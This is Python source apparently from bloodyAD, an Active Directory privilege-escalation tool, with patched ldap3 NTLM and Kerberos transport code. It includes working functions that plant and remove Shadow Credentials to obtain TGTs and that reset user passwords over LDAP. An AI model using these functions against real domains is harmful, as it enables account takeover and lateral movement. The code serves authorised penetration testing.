        key_path = path + "_priv.pem"
        with open(key_path, "wb") as f:
            f.write(
                key.private_bytes(
                    serialization.Encoding.PEM,
                    serialization.PrivateFormat.TraditionalOpenSSL,
                    serialization.NoEncryption(),
                )
            )
        cert_path = path + "_cert.pem"
        with open(cert_path, "wb") as f:
            f.write(cert.public_bytes(serialization.Encoding.PEM))

        LOG.info("[+] Saved PEM certificate at path: %s" % cert_path)
        LOG.info("[+] Saved PEM private key at path: %s" % key_path)
        LOG.info(
            "A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools"
        )
        LOG.info("Run the following command to obtain a TGT:")
        LOG.info(
            "python3 PKINITtools/gettgtpkinit.py -cert-pem %s"
            " -key-pem %s %s/%s %s.ccache"
            % (cert_path, key_path, conn.conf.domain, identity, path)
        )

    else:
        raise ResultError(ldap_conn.result)


def delShadowCredentials(conn, identity, rsakey_sha256):
    """
    Delete the crafted certificate (Shadow Credentials) from the msDS-KeyCredentialLink attribute of the user provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
    """
    attr = "msDS-KeyCredentialLink"
    keyCreds = search(conn, identity, attr=attr)[0]["raw_attributes"][attr]
    newKeyCreds = []
    isFound = False
    for keyCred in keyCreds:
        key_raw = common.DNBinary(keyCred).value
        key_blob = cryptography.KEYCREDENTIALLINK_BLOB(key_raw)
        if rsakey_sha256 and key_blob.getKeyID() != binascii.unhexlify(rsakey_sha256):
            newKeyCreds.append(keyCred)
        else:
            isFound = True
            LOG.debug("[*] Key to delete found")

    if not isFound:
        LOG.warning("[!] No key found")

    setAttr(conn, identity, attr, newKeyCreds)



#!/usr/bin/env python3
from bloodyAD import cli_modules
from bloodyAD import functions, ConnectionHandler
import sys, argparse

# For dynamic argparse
from inspect import getmembers, isfunction, signature
from pkgutil import iter_modules


def main():
    parser = argparse.ArgumentParser(description="AD Privesc Swiss Army Knife")

    parser.add_argument("-d", "--domain", help="Domain used for NTLM authentication")
    parser.add_argument(
        "-u", "--username", help="Username used for NTLM authentication"
    )
    parser.add_argument(
        "-p",
        "--password",
        help="Cleartext password or LMHASH:NTHASH for NTLM authentication",
    )
    parser.add_argument("-k", "--kerberos", action="store_true", default=False)
    parser.add_argument(
        "-c",
        "--certificate",
        help='Certificate authentication, e.g: "path/to/key:path/to/cert"',
    )
    parser.add_argument(
        "-s",
        "--secure",
        help="Try to use LDAP over TLS aka LDAPS (default is LDAP)",
        action="store_true",
        default=False,
    )
    parser.add_argument(
        "--host",
        help="Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)",
    )

    # Find list of functions and their arguments in modules.py
    # And add them all as subparsers
    subparsers = parser.add_subparsers(title="Commands")
    for name, f in functions:
        subparser = subparsers.add_parser(name, prog=f.__doc__)
        subparser.add_argument("func_args", nargs="*")
        subparser.set_defaults(func=f)

    # Iterates all submodules in module package and creates one parser per submodule
    for importer, submodname, ispkg in iter_modules(cli_modules.__path__):
        subparser = subparsers.add_parser(
            submodname, help=f"[{submodname.upper()}] function category"
        )
        subsubparsers = subparser.add_subparsers(title=f"{submodname} commands")
        submodule = importer.find_spec(submodname).loader.load_module()
        for function_name, function in getmembers(submodule, isfunction):
            # Doesn't take into account function imported in the module
            if function.__module__ != submodname:
                continue

            function_doc, params_doc = doc_parser(function.__doc__)
            # This formatter class prints default values
            subsubparser = subsubparsers.add_parser(
                function_name,
                help=function_doc,
                formatter_class=argparse.ArgumentDefaultsHelpFormatter,
            )
            # Gets function signature to extract parameters default values
            func_signature = signature(function)
            for param_name, param_value, param_doc in zip(
                function.__annotations__.keys(),
                function.__annotations__.values(),
                params_doc,
            ):
                parser_args = {}

                # Fetches help from param_doc, if param_name doesn't match
                # name in param_doc, raises exception
                try:
                    param_doc = param_doc.split(f":param {param_name}: ")[1]
                except IndexError:
                    print(f"[-] param_name '{param_name}' doesn't match '{param_doc}'")
                    raise
                parser_args["help"] = param_doc

                # If parameter has a default value, then it will be an optional argument
                param_signature = func_signature.parameters.get(param_name)
                param_name = param_name.replace("_", "-")
                if param_signature.default is param_signature.empty:
                    arg_name = param_name
                else:
                    arg_name = f"--{param_name}"
                    parser_args["default"] = param_signature.default

                # If param_type is not a string describing a type it's a literal with a restricted set of values
                if "Literal" in str(param_value):
                    parser_args["choices"] = param_value.__args__
                    parser_args["type"] = type(param_value.__args__[0])
                else:
                    if param_value.__name__ == "bool":
                        parser_args["action"] = "store_true"
                    else:
                        parser_args["type"] = param_value

                subsubparser.add_argument(arg_name, **parser_args)
            # If a function name is provided in cli, arg.func will exist with function as value
            subsubparser.set_defaults(func=function)

    args = parser.parse_args()

    if "func" not in args:
        parser.print_help(sys.stderr)
        sys.exit(1)

    # Get the list of parameters to provide to the command
    param_names = args.func.__code__.co_varnames[1 : args.func.__code__.co_argcount]
    if "func_args" in args:
        param_values = args.func_args
        if len(param_values) > len(param_names):
            print("You provided too many arguments\n")
            print(args.func.__name__ + ":")
            print(args.func.__doc__)
            sys.exit(1)
        params = {param_names[i]: param_values[i] for i in range(len(param_values))}
    else:
        params = {param_name: vars(args)[param_name] for param_name in param_names}

    # Launch the command
    conn = ConnectionHandler(args=args)
    args.func(conn, **params)


# Gets unparsed doc and returns a tuple of two values
# first is function description (starts at the beginning of the string and ends before two newlines)
# second is a list of parameter descriptions
# (other part of the string, one parameter description per line, starting with :param param_name:)
def doc_parser(doc):
    doc_parsed = doc.splitlines()

    return doc_parsed[1], doc_parsed[3:-1]


if __name__ == "__main__":
    main()



import ldap3
from bloodyAD import utils
from bloodyAD.utils import LOG

# Full info on what you can do:
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/change-windows-active-directory-user-password
def password(conn, target: str, newpass: str, oldpass: str = None):
    """
    Change password of a user/computer

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param newpass: new password for the target
    :param oldpass: old password of the target, mandatory if you don't have "change password" permission on the target
    """
    ldap_conn = conn.getLdapConnection()
    target_dn = utils.resolvDN(ldap_conn, target)

    encoded_new_password = ('"%s"' % newpass).encode('utf-16-le')
    if oldpass is not None:
        encoded_old_password = ('"%s"' % oldpass).encode('utf-16-le')
        op_list = [
            (ldap3.MODIFY_DELETE, [encoded_old_password]),
            (ldap3.MODIFY_ADD, [encoded_new_password])
        ]
    else:
        op_list = [(ldap3.MODIFY_REPLACE, [encoded_new_password])]
    
    try:
        ldap_conn.modify(target_dn, {'unicodePwd': op_list})
    except ldap3.core.exceptions.LDAPConstraintViolationResult as e:
        error_str = "If it's a user, double check new password fits password policy (don't forget password history and password change frequency!)"
        if oldpass is not None:
            error_str += ", also ensure old password is valid"
        ldap3.core.exceptions.LDAPConstraintViolationResult.__str__ = lambda self: error_str

        raise e

    LOG.info("[+] Password changed successfully!")
    return True


from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR, sddl_acl_control

def to_sddl(self, object_type = None):
    t=''
    if self.Owner is not None:
        t =  'O:' + self.Owner.to_sddl()
    if self.Group is not None:
        t += 'G:' + self.Group.to_sddl()
    if self.Sacl is not None:
        t+= 'S:' + sddl_acl_control(self.Control) + self.Sacl.to_sddl(object_type)
    if self.Dacl is not None:
        t+= 'D:' + sddl_acl_control(self.Control) + self.Dacl.to_sddl(object_type)
    return t

SECURITY_DESCRIPTOR.to_sddl = to_sddl


import ldap3

SIGN = "sign"
ENCRYPT = "ENCRYPT"

from ldap3.core.connection import *


def __init__(
    self,
    server,
    user=None,
    password=None,
    session_security=None,
    auto_bind=AUTO_BIND_DEFAULT,
    version=3,
    authentication=None,
    client_strategy=SYNC,
    auto_referrals=True,
    auto_range=True,
    sasl_mechanism=None,
    sasl_credentials=None,
    check_names=True,
    collect_usage=False,
    read_only=False,
    lazy=False,
    raise_exceptions=False,
    pool_name=None,
    pool_size=None,
    pool_lifetime=None,
    cred_store=None,
    fast_decoder=True,
    receive_timeout=None,
    return_empty_attributes=True,
    use_referral_cache=False,
    auto_escape=True,
    auto_encode=True,
    pool_keepalive=None,
    source_address=None,
    source_port=None,
    source_port_list=None,
):
    conf_default_pool_name = get_config_parameter("DEFAULT_THREADED_POOL_NAME")
    self.connection_lock = (
        RLock()
    )  # re-entrant lock to ensure that operations in the Connection object are executed atomically in the same thread
    with self.connection_lock:
        if client_strategy not in CLIENT_STRATEGIES:
            self.last_error = "unknown client connection strategy"
            if log_enabled(ERROR):
                log(ERROR, "%s for <%s>", self.last_error, self)
            raise LDAPUnknownStrategyError(self.last_error)

        self.strategy_type = client_strategy
        self.user = user
        self.password = password

        if not authentication and self.user:
            self.authentication = SIMPLE
        elif not authentication:
            self.authentication = ANONYMOUS
        elif authentication in [SIMPLE, ANONYMOUS, SASL, NTLM]:
            self.authentication = authentication
        else:
            self.last_error = "unknown authentication method"
            if log_enabled(ERROR):
                log(ERROR, "%s for <%s>", self.last_error, self)
            raise LDAPUnknownAuthenticationMethodError(self.last_error)

        self.version = version
        self.auto_referrals = True if auto_referrals else False
        self.request = None
        self.response = None
        self.result = None
        self.bound = False
        self.listening = False
        self.closed = True
        self.last_error = None
        if (
            auto_bind is False
        ):  # compatibility with older version where auto_bind was a boolean
            self.auto_bind = AUTO_BIND_DEFAULT
        elif auto_bind is True:
            self.auto_bind = AUTO_BIND_NO_TLS
        else:
            self.auto_bind = auto_bind
        self.sasl_mechanism = sasl_mechanism
        self.sasl_credentials = sasl_credentials
        self._usage = ConnectionUsage() if collect_usage else None
        self.socket = None
        self.tls_started = False
        self.sasl_in_progress = False
        self.read_only = read_only
        self._context_state = []
        self._deferred_open = False
        self._deferred_bind = False
        self._deferred_start_tls = False
        self._bind_controls = None
        self._executing_deferred = False
        self.lazy = lazy
        self.pool_name = pool_name if pool_name else conf_default_pool_name
        self.pool_size = pool_size
        self.cred_store = cred_store
        self.pool_lifetime = pool_lifetime
        self.pool_keepalive = pool_keepalive
        self.starting_tls = False
        self.check_names = check_names
        self.raise_exceptions = raise_exceptions
        self.auto_range = True if auto_range else False
        self.extend = ExtendedOperationsRoot(self)
        self._entries = []
        self.fast_decoder = fast_decoder
        self.receive_timeout = receive_timeout
        self.empty_attributes = return_empty_attributes
        self.use_referral_cache = use_referral_cache
        self.auto_escape = auto_escape
        self.auto_encode = auto_encode
        self._digest_md5_kic = None
        self._digest_md5_kis = None
        self._digest_md5_kcc_cipher = None
        self._digest_md5_kcs_cipher = None
        self._digest_md5_sec_num = 0
        self.krb_ctx = None

        if session_security and not (
            self.authentication == NTLM or self.sasl_mechanism == GSSAPI
        ):
            self.last_error = (
                '"session_security" option only available for NTLM and GSSAPI'
            )
            if log_enabled(ERROR):
                log(ERROR, "%s for <%s>", self.last_error, self)
            raise LDAPInvalidValueError(self.last_error)
        self.session_security = session_security

        port_err = check_port_and_port_list(source_port, source_port_list)
        if port_err:
            if log_enabled(ERROR):
                log(ERROR, port_err)
            raise LDAPInvalidPortError(port_err)
        # using an empty string to bind a socket means "use the default as if this wasn't provided" because socket
        # binding requires that you pass something for the ip if you want to pass a specific port
        self.source_address = source_address if source_address is not None else ""
        # using 0 as the source port to bind a socket means "use the default behavior of picking a random port from
        # all ports as if this wasn't provided" because socket binding requires that you pass something for the port
        # if you want to pass a specific ip
        self.source_port_list = [0]
        if source_port is not None:
            self.source_port_list = [source_port]
        elif source_port_list is not None:
            self.source_port_list = source_port_list[:]

        if isinstance(server, STRING_TYPES):
            server = Server(server)
        if isinstance(server, SEQUENCE_TYPES):
            server = ServerPool(server, ROUND_ROBIN, active=True, exhaust=True)

        if isinstance(server, ServerPool):
            self.server_pool = server
            self.server_pool.initialize(self)
            self.server = self.server_pool.get_current_server(self)
        else:
            self.server_pool = None
            self.server = server

        # if self.authentication == SIMPLE and self.user and self.check_names:
        #     self.user = safe_dn(self.user)
        #     if log_enabled(EXTENDED):
        #         log(EXTENDED, 'user name sanitized to <%s> for simple authentication via <%s>', self.user, self)

        if self.strategy_type == SYNC:
            self.strategy = SyncStrategy(self)
        elif self.strategy_type == SAFE_SYNC:
            self.strategy = SafeSyncStrategy(self)
        elif self.strategy_type == SAFE_RESTARTABLE:
            self.strategy = SafeRestartableStrategy(self)
        elif self.strategy_type == ASYNC:
            self.strategy = AsyncStrategy(self)
        elif self.strategy_type == LDIF:
            self.strategy = LdifProducerStrategy(self)
        elif self.strategy_type == RESTARTABLE:
            self.strategy = RestartableStrategy(self)
        elif self.strategy_type == REUSABLE:
            self.strategy = ReusableStrategy(self)
            self.lazy = False
        elif self.strategy_type == MOCK_SYNC:
            self.strategy = MockSyncStrategy(self)
        elif self.strategy_type == MOCK_ASYNC:
            self.strategy = MockAsyncStrategy(self)
        elif self.strategy_type == ASYNC_STREAM:
            self.strategy = AsyncStreamStrategy(self)
        else:
            self.last_error = "unknown strategy"
            if log_enabled(ERROR):
                log(ERROR, "%s for <%s>", self.last_error, self)
            raise LDAPUnknownStrategyError(self.last_error)

        # maps strategy functions to connection functions
        self.send = self.strategy.send
        self.open = self.strategy.open
        self.get_response = self.strategy.get_response
        self.post_send_single_response = self.strategy.post_send_single_response
        self.post_send_search = self.strategy.post_send_search

        if not self.strategy.no_real_dsa:
            self._do_auto_bind()
        # else:  # for strategies with a fake server set get_info to NONE if server hasn't a schema
        #     if self.server and not self.server.schema:
        #         self.server.get_info = NONE
        if log_enabled(BASIC):
            if get_library_log_hide_sensitive_data():
                log(
                    BASIC,
                    "instantiated Connection: <%s>",
                    self.repr_with_sensitive_data_stripped(),
                )
            else:
                log(BASIC, "instantiated Connection: <%r>", self)


Connection.__init__ = __init__

def bind(self,
             read_server_info=True,
             controls=None):
        """Bind to ldap Server with the authentication method and the user defined in the connection
        :param read_server_info: reads info from server
        :param controls: LDAP controls to send along with the bind operation
        :type controls: list of tuple
        :return: bool
        """
        if log_enabled(BASIC):
            log(BASIC, 'start BIND operation via <%s>', self)
        self.last_error = None
        with self.connection_lock:
            if self.lazy and not self._executing_deferred:
                if self.strategy.pooled:
                    self.strategy.validate_bind(controls)
                self._deferred_bind = True
                self._bind_controls = controls
                self.bound = True
                if log_enabled(BASIC):
                    log(BASIC, 'deferring bind for <%s>', self)
            else:
                self._deferred_bind = False
                self._bind_controls = None
                if self.closed:  # try to open connection if closed
                    self.open(read_server_info=False)
                if self.authentication == ANONYMOUS:
                    if log_enabled(PROTOCOL):
                        log(PROTOCOL, 'performing anonymous BIND for <%s>', self)
                    if not self.strategy.pooled:
                        request = bind_operation(self.version, self.authentication, self.user, '', auto_encode=self.auto_encode)
                        if log_enabled(PROTOCOL):
                            log(PROTOCOL, 'anonymous BIND request <%s> sent via <%s>', bind_request_to_dict(request), self)
                        response = self.post_send_single_response(self.send('bindRequest', request, controls))
                    else:
                        response = self.strategy.validate_bind(controls)  # only for REUSABLE
                elif self.authentication == SIMPLE:
                    if log_enabled(PROTOCOL):
                        log(PROTOCOL, 'performing simple BIND for <%s>', self)
                    if not self.strategy.pooled:
                        request = bind_operation(self.version, self.authentication, self.user, self.password, auto_encode=self.auto_encode)
                        if log_enabled(PROTOCOL):
                            log(PROTOCOL, 'simple BIND request <%s> sent via <%s>', bind_request_to_dict(request), self)
                        response = self.post_send_single_response(self.send('bindRequest', request, controls))
                    else:
                        response = self.strategy.validate_bind(controls)  # only for REUSABLE
                elif self.authentication == SASL:
                    if self.sasl_mechanism in SASL_AVAILABLE_MECHANISMS:
                        if log_enabled(PROTOCOL):
                            log(PROTOCOL, 'performing SASL BIND for <%s>', self)
                        if not self.strategy.pooled:
                            response = self.do_sasl_bind(controls)
                        else:
                            response = self.strategy.validate_bind(controls)  # only for REUSABLE
                    else:
                        self.last_error = 'requested SASL mechanism not supported'
                        if log_enabled(ERROR):
                            log(ERROR, '%s for <%s>', self.last_error, self)
                        raise LDAPSASLMechanismNotSupportedError(self.last_error)
                elif self.authentication == NTLM:
                    if self.user and self.password is not None and len(self.user.split('\\')) == 2:
                        if log_enabled(PROTOCOL):
                            log(PROTOCOL, 'performing NTLM BIND for <%s>', self)
                        if not self.strategy.pooled:
                            response = self.do_ntlm_bind(controls)
                        else:
                            response = self.strategy.validate_bind(controls)  # only for REUSABLE
                    else:  # user or password missing
                        self.last_error = 'NTLM needs domain\\username and a password'
                        if log_enabled(ERROR):
                            log(ERROR, '%s for <%s>', self.last_error, self)
                        raise LDAPUnknownAuthenticationMethodError(self.last_error)
                else:
                    self.last_error = 'unknown authentication method'
                    if log_enabled(ERROR):
                        log(ERROR, '%s for <%s>', self.last_error, self)
                    raise LDAPUnknownAuthenticationMethodError(self.last_error)

                if not self.strategy.sync and not self.strategy.pooled and self.authentication not in (SASL, NTLM):  # get response if asynchronous except for SASL and NTLM that return the bind result even for asynchronous strategy
                    _, result = self.get_response(response)
                    if log_enabled(PROTOCOL):
                        log(PROTOCOL, 'async BIND response id <%s> received via <%s>', result, self)
                elif self.strategy.sync:
                    result = self.result
                    if log_enabled(PROTOCOL):
                        log(PROTOCOL, 'BIND response <%s> received via <%s>', result, self)
                elif self.strategy.pooled or self.authentication in (SASL, NTLM):  # asynchronous SASL and NTLM or reusable strtegy get the bind result synchronously
                    result = response
                else:
                    self.last_error = 'unknown authentication method'
                    if log_enabled(ERROR):
                        log(ERROR, '%s for <%s>', self.last_error, self)
                    raise LDAPUnknownAuthenticationMethodError(self.last_error)

                if result is None:
                    # self.bound = True if self.strategy_type == REUSABLE else False
                    self.bound = False
                elif result is True:
                    self.bound = True
                elif result is False:
                    self.bound = False
                else:
                    self.bound = True if result['result'] == RESULT_SUCCESS else False
                    if not self.bound and result and result['description'] and not self.last_error:
                        self.last_error = result['description']

                if read_server_info and self.bound:
                    self.refresh_server_info()
            self._entries = []

            if log_enabled(BASIC):
                log(BASIC, 'done BIND operation, result <%s>', self.bound)

            return self._prepare_return_value(self.bound, self.result)


Connection.bind = bind


def do_ntlm_bind(self, controls):
    if log_enabled(BASIC):
        log(BASIC, "start NTLM BIND operation via <%s>", self)
    self.last_error = None
    with self.connection_lock:
        if not self.sasl_in_progress:
            self.sasl_in_progress = True  # ntlm is same of sasl authentication
            try:
                # additional import for NTLM
                from ldap3.utils.ntlm import NtlmClient

                domain_name, user_name = self.user.split("\\", 1)
                self.ntlm_client = NtlmClient(
                    user_name=user_name,
                    domain=domain_name,
                    password=self.password,
                )
                if self.session_security == ENCRYPT:
                    self.ntlm_client.confidentiality = True

                # as per https://msdn.microsoft.com/en-us/library/cc223501.aspx
                # send a sicilyPackageDiscovery request (in the bindRequest)
                request = bind_operation(
                    self.version, "SICILY_PACKAGE_DISCOVERY", self.ntlm_client
                )
                if log_enabled(PROTOCOL):
                    log(
                        PROTOCOL,
                        "NTLM SICILY PACKAGE DISCOVERY request sent via <%s>",
                        self,
                    )
                response = self.post_send_single_response(
                    self.send("bindRequest", request, controls)
                )
                if not self.strategy.sync:
                    _, result = self.get_response(response)
                else:
                    result = response[0]
                if "server_creds" in result:
                    sicily_packages = result["server_creds"].decode("ascii").split(";")
                    if "NTLM" in sicily_packages:  # NTLM available on server
                        request = bind_operation(
                            self.version,
                            "SICILY_NEGOTIATE_NTLM",
                            self.ntlm_client,
                        )
                        if log_enabled(PROTOCOL):
                            log(
                                PROTOCOL,
                                "NTLM SICILY NEGOTIATE request sent via <%s>",
                                self,
                            )
                        response = self.post_send_single_response(
                            self.send("bindRequest", request, controls)
                        )
                        if not self.strategy.sync:
                            _, result = self.get_response(response)
                        else:
                            if log_enabled(PROTOCOL):
                                log(
                                    PROTOCOL,
                                    "NTLM SICILY NEGOTIATE response <%s>"
                                    " received via <%s>",
                                    response[0],
                                    self,
                                )
                            result = response[0]

                        if result["result"] == RESULT_SUCCESS:
                            request = bind_operation(
                                self.version,
                                "SICILY_RESPONSE_NTLM",
                                self.ntlm_client,
                                result["server_creds"],
                            )
                            if log_enabled(PROTOCOL):
                                log(
                                    PROTOCOL,
                                    "NTLM SICILY RESPONSE NTLM request sent via <%s>",
                                    self,
                                )
                            response = self.post_send_single_response(
                                self.send("bindRequest", request, controls)
                            )
                            if not self.strategy.sync:
                                _, result = self.get_response(response)
                            else:
                                if log_enabled(PROTOCOL):
                                    log(
                                        PROTOCOL,
                                        "NTLM BIND response <%s> received via <%s>",
                                        response[0],
                                        self,
                                    )
                                result = response[0]
                else:
                    result = None
            finally:
                self.sasl_in_progress = False

            if log_enabled(BASIC):
                log(BASIC, "done SASL NTLM operation, result <%s>", result)

            return result


Connection.do_ntlm_bind = do_ntlm_bind

from ldap3.protocol.sasl.kerberos import *
from ldap3.protocol.sasl.kerberos import (
    _common_determine_target_name,
    _common_determine_authz_id_and_creds,
)


def _common_process_end_token_get_security_layers(
    negotiated_token, session_security=None
):
    """Process the response we got at the end of our SASL negotiation wherein the server told us what
    minimum security layers we need, and return a bytearray for the client security layers we want.
    This function throws an error on a malformed token from the server.
    The ldap3 library does not support security layers, and only supports authentication with kerberos,
    so an error will be thrown for any tokens that indicate a security layer requirement.
    """
    if len(negotiated_token) != 4:
        raise LDAPCommunicationError("Incorrect response from server")

    server_security_layers = negotiated_token[0]
    if not isinstance(server_security_layers, int):
        server_security_layers = ord(server_security_layers)
    if server_security_layers in (0, NO_SECURITY_LAYER):
        if negotiated_token[1:] != "\x00\x00\x00":
            raise LDAPCommunicationError(
                "Server max buffer size must be 0 if no security layer"
            )
    security_layer = (
        CONFIDENTIALITY_PROTECTION if session_security else NO_SECURITY_LAYER
    )
    if not (server_security_layers & security_layer):
        raise LDAPCommunicationError("Server doesn't support the security level asked")

    # this is here to encourage anyone implementing client security layers to do it
    # for both windows and posix
    client_security_layers = bytearray([security_layer, 0, 0, 0])
    return client_security_layers


ldap3.protocol.sasl.kerberos._common_process_end_token_get_security_layers = (
    _common_process_end_token_get_security_layers
)


def _posix_sasl_gssapi(connection, controls):
    """Performs a bind using the Kerberos v5 ("GSSAPI") SASL mechanism
    from RFC 4752 using the gssapi package that works natively on most
    posix operating systems.
    """
    target_name = gssapi.Name(
        _common_determine_target_name(connection),
        gssapi.NameType.hostbased_service,
    )
    authz_id, creds = _common_determine_authz_id_and_creds(connection)

    ctx = gssapi.SecurityContext(
        name=target_name,
        mech=gssapi.MechType.kerberos,
        creds=creds,
        channel_bindings=get_channel_bindings(connection.socket),
    )
    in_token = None
    try:
        while True:
            out_token = ctx.step(in_token)
            if out_token is None:
                out_token = ""
            result = send_sasl_negotiation(connection, controls, out_token)
            in_token = result["saslCreds"]
            try:
                # This raised an exception in gssapi<1.1.2 if the context was
                # incomplete, but was fixed in
                # https://github.com/pythongssapi/python-gssapi/pull/70
                if ctx.complete:
                    break
            except gssapi.exceptions.MissingContextError:
                pass

        unwrapped_token = ctx.unwrap(in_token)
        client_security_layers = _common_process_end_token_get_security_layers(
            unwrapped_token.message, connection.session_security
        )
        out_token = ctx.wrap(bytes(client_security_layers) + authz_id, False)
        connection.krb_ctx = ctx
        return send_sasl_negotiation(connection, controls, out_token.message)
    except (gssapi.exceptions.GSSError, LDAPCommunicationError):
        abort_sasl_negotiation(connection, controls)
        raise


ldap3.protocol.sasl.kerberos._posix_sasl_gssapi = _posix_sasl_gssapi


def _windows_sasl_gssapi(connection, controls):
    """Performs a bind using the Kerberos v5 ("GSSAPI") SASL mechanism
    from RFC 4752 using the winkerberos package that works natively on most
    windows operating systems.
    """
    target_name = _common_determine_target_name(connection)
    # initiation happens before beginning the SASL bind when using windows kerberos
    authz_id, _ = _common_determine_authz_id_and_creds(connection)
    gssflags = (
        winkerberos.GSS_C_MUTUAL_FLAG
        | winkerberos.GSS_C_SEQUENCE_FLAG
        | winkerberos.GSS_C_INTEG_FLAG
        | winkerberos.GSS_C_CONF_FLAG
    )
    _, ctx = winkerberos.authGSSClientInit(target_name, gssflags=gssflags)

    in_token = b""
    try:
        negotiation_complete = False
        while not negotiation_complete:
            # GSSAPI is a "client goes first" SASL mechanism. Send the first "response" to the server and
            # recieve its first challenge.
            # Despite this, we can get channel binding, which includes CBTs for windows environments computed from
            # the peer certificate, before starting.
            status = winkerberos.authGSSClientStep(
                ctx,
                base64.b64encode(in_token).decode("utf-8"),
                channel_bindings=get_channel_bindings(connection.socket),
            )
            # figure out if we're done with our sasl negotiation
            negotiation_complete = status == winkerberos.AUTH_GSS_COMPLETE
            out_token = winkerberos.authGSSClientResponse(ctx) or ""
            out_token_bytes = base64.b64decode(out_token)
            result = send_sasl_negotiation(connection, controls, out_token_bytes)
            in_token = result["saslCreds"] or b""

        winkerberos.authGSSClientUnwrap(ctx, base64.b64encode(in_token).decode("utf-8"))
        negotiated_token = ""
        if winkerberos.authGSSClientResponse(ctx):
            negotiated_token = base64.standard_b64decode(
                winkerberos.authGSSClientResponse(ctx)
            )
        client_security_layers = _common_process_end_token_get_security_layers(
            negotiated_token, connection.session_security
        )
        # manually construct a message indicating use of authorization-only layer
        # see winkerberos example: https://github.com/mongodb/winkerberos/blob/master/test/test_winkerberos.py
        authz_only_msg = base64.b64encode(
            bytes(client_security_layers) + authz_id
        ).decode("utf-8")
        winkerberos.authGSSClientWrap(ctx, authz_only_msg)
        out_token = winkerberos.authGSSClientResponse(ctx) or ""
        connection.krb_ctx = ctx
        return send_sasl_negotiation(connection, controls, base64.b64decode(out_token))
    except (winkerberos.GSSError, LDAPCommunicationError):
        abort_sasl_negotiation(connection, controls)
        raise


ldap3.protocol.sasl.kerberos._windows_sasl_gssapi = _windows_sasl_gssapi

from ldap3.strategy.base import *


def sending(self, ldap_message):
    if log_enabled(NETWORK):
        log(NETWORK, "sending 1 ldap message for <%s>", self.connection)
    try:
        encoded_message = encode(ldap_message)
        if (
            self.connection.sasl_mechanism == DIGEST_MD5
            and self.connection._digest_md5_kic
            and not self.connection.sasl_in_progress
        ):
            # If we are using DIGEST-MD5 and LDAP signing is enabled: add a signature to the message
            sec_num = self.connection._digest_md5_sec_num  # added underscore GC
            kic = self.connection._digest_md5_kic  # lowercase GC
            signature = bytes.fromhex(
                md5_hmac(kic, int(sec_num).to_bytes(4, "big") + encoded_message)[0:20]
            )
            payload = encoded_message + signature
            if self.connection._digest_md5_kcc_cipher:
                payload = self.connection._digest_md5_kcc_cipher.encrypt(payload)
            # RFC 2831 sign: encoded_message = sizeOf(encoded_message + signature + 0x0001 + secNum) + encoded_message + signature + 0x0001 + secNum
            # RFC 2831 encrypt: encoded_message = sizeOf(ciphertext + 0x0001 +secNum) + CIPHER(encoded_message + pad + signature) + 0x0001 + secNum
            encoded_message = (
                int(len(payload) + 2 + 4).to_bytes(4, "big")
                + payload
                + int(1).to_bytes(2, "big")
                + int(sec_num).to_bytes(4, "big")
            )
            self.connection._digest_md5_sec_num += 1
        elif (
            self.connection.session_security == ENCRYPT
            and not self.connection.sasl_in_progress
        ):
            if self.connection.authentication == NTLM:
                # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/115f9c7d-bc30-4262-ae96-254555c14ea6
                encoded_message = self.connection.ntlm_client.seal(encoded_message)
            elif self.connection.sasl_mechanism == GSSAPI:
                if posix_gssapi_unavailable:
                    import winkerberos

                    winkerberos.authGSSClientWrap(
                        self.connection.krb_ctx,
                        base64.b64encode(encoded_message).decode("utf-8"),
                        None,
                        1,
                    )
                    encoded_message = base64.b64decode(
                        winkerberos.authGSSClientResponse(self.connection.krb_ctx)
                    )
                else:
                    encoded_message = self.connection.krb_ctx.wrap(
                        encoded_message, True
                    ).message
            encoded_message = (
                int(len(encoded_message)).to_bytes(4, "big") + encoded_message
            )

        self.connection.socket.sendall(encoded_message)
        if log_enabled(EXTENDED):
            log(
                EXTENDED,
                "ldap message sent via <%s>:%s",
                self.connection,
                format_ldap_message(ldap_message, ">>"),
            )
        if log_enabled(NETWORK):
            log(
                NETWORK,
                "sent %d bytes via <%s>",
                len(encoded_message),
                self.connection,
            )
    except socket.error as e:
        self.connection.last_error = "socket sending error" + str(e)
        encoded_message = None
        if log_enabled(ERROR):
            log(
                ERROR,
                "<%s> for <%s>",
                self.connection.last_error,
                self.connection,
            )
        # raise communication_exception_factory(LDAPSocketSendError, exc)(self.connection.last_error)
        raise communication_exception_factory(LDAPSocketSendError, type(e)(str(e)))(
            self.connection.last_error
        )
    if self.connection.usage:
        self.connection._usage.update_transmitted_message(
            self.connection.request, len(encoded_message)
        )


BaseStrategy.sending = sending

from ldap3.strategy.sync import *


def receiving(self):
    """
    Receives data over the socket
    Checks if the socket is closed
    """
    messages = []
    receiving = True
    unprocessed = b""
    data = b""
    get_more_data = True
    # exc = None  # not needed here GC
    sasl_total_bytes_received = 0
    sasl_received_data = b""  # used to verify the signature
    sasl_next_packet = b""
    # sasl_signature = b'' # not needed here? GC
    # sasl_sec_num = b'' # used to verify the signature  # not needed here, reformatted to lowercase GC
    sasl_buffer_length = -1  # added, not initialized? GC
    while receiving:
        if get_more_data:
            try:
                data = self.connection.socket.recv(self.socket_size)
            except (OSError, socket.error, AttributeError) as e:
                self.connection.last_error = "error receiving data: " + str(e)
                try:  # try to close the connection before raising exception
                    self.close()
                except (socket.error, LDAPExceptionError):
                    pass
                if log_enabled(ERROR):
                    log(
                        ERROR,
                        "<%s> for <%s>",
                        self.connection.last_error,
                        self.connection,
                    )
                # raise communication_exception_factory(LDAPSocketReceiveError, exc)(self.connection.last_error)
                raise communication_exception_factory(
                    LDAPSocketReceiveError, type(e)(str(e))
                )(self.connection.last_error)

            # If we are using DIGEST-MD5 and LDAP signing is set : verify & remove the signature from the message
            if (
                self.connection._digest_md5_kis
                or self.connection.session_security == ENCRYPT
            ) and not self.connection.sasl_in_progress:
                data = sasl_next_packet + data

                if sasl_received_data == b"" or sasl_next_packet:
                    # Remove the sizeOf(encoded_message + signature + 0x0001 + secNum) from data.
                    sasl_buffer_length = int.from_bytes(data[0:4], "big")
                    data = data[4:]
                sasl_next_packet = b""
                sasl_total_bytes_received += len(data)
                sasl_received_data += data

                if sasl_total_bytes_received >= sasl_buffer_length:
